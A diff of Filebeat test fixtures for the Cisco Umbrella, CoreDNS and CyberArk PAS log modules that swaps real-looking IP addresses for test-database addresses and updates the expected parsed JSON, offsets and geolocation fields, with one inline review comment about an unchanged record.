--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log
@@ -1,2 +1,2 @@
-"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","8.8.8.8","0","Test Category"
-"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","8.8.8.8","445","Test Category"
+"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","175.16.199.1","0","Test Category"
+"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","175.16.199.1","445","Test Category"
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json
index 4d25464cb614..87e53f4aca06 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json
@@ -2,22 +2,22 @@ { "@timestamp": "2020-08-26T20:32:46.000Z", "cisco.umbrella.categories": "Test Category", - "destination.address": "8.8.8.8", - "destination.ip": "8.8.8.8", + "destination.address": "175.16.199.1", + "destination.ip": "175.16.199.1", "destination.port": "0", "event.dataset": "cisco.umbrella", "event.module": "cisco", - "event.original": "\\\"2020-08-26 20:32:46\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"0\\\",\\\"8.8.8.8\\\",\\\"0\\\",\\\"Test Category\\\"", + "event.original": "\\\"2020-08-26 20:32:46\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"0\\\",\\\"175.16.199.1\\\",\\\"0\\\",\\\"Test Category\\\"", "fileset.name": "umbrella", "input.type": "log", "log.offset": 0, - "message": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"8.8.8.8\",\"0\",\"Test Category\"", + "message": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"175.16.199.1\",\"0\",\"Test Category\"", "observer.product": "Umbrella", "observer.type": "firewall", "observer.vendor": "Cisco", "related.ip": [ - "192.168.1.1", - "8.8.8.8" + "175.16.199.1", + "192.168.1.1" ], "related.user": [ "elasticuser" 
@@ -31,22 +31,22 @@ { "@timestamp": "2020-08-26T20:32:45.000Z", "cisco.umbrella.categories": "Test Category", - "destination.address": "8.8.8.8", - "destination.ip": "8.8.8.8", + "destination.address": "175.16.199.1", + "destination.ip": "175.16.199.1", "destination.port": "445", "event.dataset": "cisco.umbrella", "event.module": "cisco", - "event.original": "\\\"2020-08-26 20:32:45\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"61095\\\",\\\"8.8.8.8\\\",\\\"445\\\",\\\"Test Category\\\"", + "event.original": "\\\"2020-08-26 20:32:45\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"61095\\\",\\\"175.16.199.1\\\",\\\"445\\\",\\\"Test Category\\\"", "fileset.name": "umbrella", "input.type": "log", - "log.offset": 84, - "message": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"8.8.8.8\",\"445\",\"Test Category\"", + "log.offset": 89, + "message": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"175.16.199.1\",\"445\",\"Test Category\"", "observer.product": "Umbrella", "observer.type": "firewall", "observer.vendor": "Cisco", "related.ip": [ - "192.168.1.1", - "8.8.8.8" + "175.16.199.1", + "192.168.1.1" ], "related.user": [ "elasticuser" diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log index bfe70c6839a8..623d55e899f9 100644 --- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log +++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log 
@@ -1,3 +1,3 @@
-"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
-"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
+"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","89.160.20.156","175.16.199.1","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
+"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","89.160.20.156","175.16.199.1","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
 "2017-10-02 23:52:53","elasticuser","ActiveDirectoryUserName,ADSite,Network","192.192.192.135","1.1.1.91","","ALLOWED","http://google.com/the.js","www.google.com","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","200","562","1489","","","","","","","","Networks"
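Review bot: The third record is left untouched and still pairs `192.192.192.135` with `1.1.1.91`, which the page gives no sign of being in the test database and which look like real routable addresses, so the file only half-adopts the convention the two rewritten lines introduce. Since the hunk already shows which addresses the pipeline resolves, the consistent fix is a single substitution on that line, e.g. `"198.51.100.135","89.160.20.156",""` (documentation space for the internal side, a resolving address for the NAT side), followed by regenerating the expected file whose `log.offset` values depend on these line lengths.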
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json index 8a38e04731e0..ca887172a2b8 100644 --- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json +++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json @@ -7,11 +7,11 @@ "cisco.umbrella.identities": "elasticuser, someotheruser", "cisco.umbrella.identity_types": "Roaming Computers", "cisco.umbrella.puas": "Malicious", - "destination.address": "8.8.8.8", - "destination.ip": "8.8.8.8", + "destination.address": "175.16.199.1", + "destination.ip": "175.16.199.1", "event.dataset": "cisco.umbrella", "event.module": "cisco", - "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"1.1.1.1\\\",\\\"8.8.8.8\\\",\\\"\\\",\\\"ALLOWED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"", + "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"89.160.20.156\\\",\\\"175.16.199.1\\\",\\\"\\\",\\\"ALLOWED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"", "event.type": [ "allowed" ], 
@@ -21,19 +21,19 @@ "http.response.status_code": "200", "input.type": "log", "log.offset": 0, - "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", + "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"89.160.20.156\",\"175.16.199.1\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "observer.product": "Umbrella", "observer.type": "proxy", "observer.vendor": "Cisco", "related.ip": [ - "1.1.1.1", + "175.16.199.1", "192.168.1.1", - "8.8.8.8" + "89.160.20.156" ], "service.type": "cisco", "source.address": "192.168.1.1", "source.ip": "192.168.1.1", - "source.nat.ip": "1.1.1.1", + "source.nat.ip": "89.160.20.156", "url.domain": "elastic.co", "url.original": "https://elastic.co/blog/ext_id=Anyclip", "url.path": "/blog/ext_id=Anyclip", 
@@ -48,11 +48,11 @@ "cisco.umbrella.identities": "elasticuser, someotheruser", "cisco.umbrella.identity_types": "Roaming Computers", "cisco.umbrella.puas": "Malicious", - "destination.address": "8.8.8.8", - "destination.ip": "8.8.8.8", + "destination.address": "175.16.199.1", + "destination.ip": "175.16.199.1", "event.dataset": "cisco.umbrella", "event.module": "cisco", - "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"1.1.1.1\\\",\\\"8.8.8.8\\\",\\\"\\\",\\\"BLOCKED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"", + "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"89.160.20.156\\\",\\\"175.16.199.1\\\",\\\"\\\",\\\"BLOCKED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"", "event.type": [ "denied" ], 
@@ -61,20 +61,20 @@ "http.request.referrer": "https://google.com/elastic", "http.response.status_code": "200", "input.type": "log", - "log.offset": 399, - "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", + "log.offset": 410, + "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"89.160.20.156\",\"175.16.199.1\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "observer.product": "Umbrella", "observer.type": "proxy", "observer.vendor": "Cisco", "related.ip": [ - "1.1.1.1", + "175.16.199.1", "192.168.1.1", - "8.8.8.8" + "89.160.20.156" ], "service.type": "cisco", "source.address": "192.168.1.1", "source.ip": "192.168.1.1", - "source.nat.ip": "1.1.1.1", + "source.nat.ip": "89.160.20.156", "url.domain": "elastic.co", "url.original": "https://elastic.co/blog/ext_id=Anyclip", "url.path": "/blog/ext_id=Anyclip", 
@@ -99,7 +99,7 @@
 "http.response.bytes": "1489",
 "http.response.status_code": "200",
 "input.type": "log",
- "log.offset": 798,
+ "log.offset": 820,
 "message": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.192.192.135\",\"1.1.1.91\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"",
 "observer.product": "Umbrella",
 "observer.type": "proxy",
diff --git a/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json b/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json
index cc9284289024..9a1c8520b766 100644
--- a/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json
+++ b/x-pack/filebeat/module/coredns/log/test/coredns-json.log-expected.json
@@ -155,4 +155,4 @@
 "coredns"
 ]
 }
-]
+]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log
index cb662d0ec481..d36d7ec7260b 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log
@@ -1,6 +1,6 @@
 <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[Address]","ExtraDetails":"","Message":"Add File Category","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File 
Category","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
-<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File 
Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File 
Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.12","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.12","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
+<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.14\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json
index 9c3195e84889..1ca12e4e4ac1 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/105_add_file_category.log-expected.json
@@ -59,7 +59,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMPLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 01:11:54",
 "event.action": "add file category",
 "event.code": "105",
@@ -79,19 +79,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -109,7 +106,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:46:48",
 "event.action": "add file category",
 "event.code": "105",
@@ -122,26 +119,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1342,
+ "log.offset": 1341,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -160,7 +154,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:17:26",
 "event.action": "add file category",
 "event.code": "105",
@@ -173,25 +167,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1983,
+ "log.offset": 1981,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -209,7 +201,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMLiveSessions",
 "cyberarkpas.audit.severity": "Info",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:20:12",
 "event.action": "add file category",
 "event.code": "105",
@@ -222,25 +214,23 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2624,
+ "log.offset": 2621,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
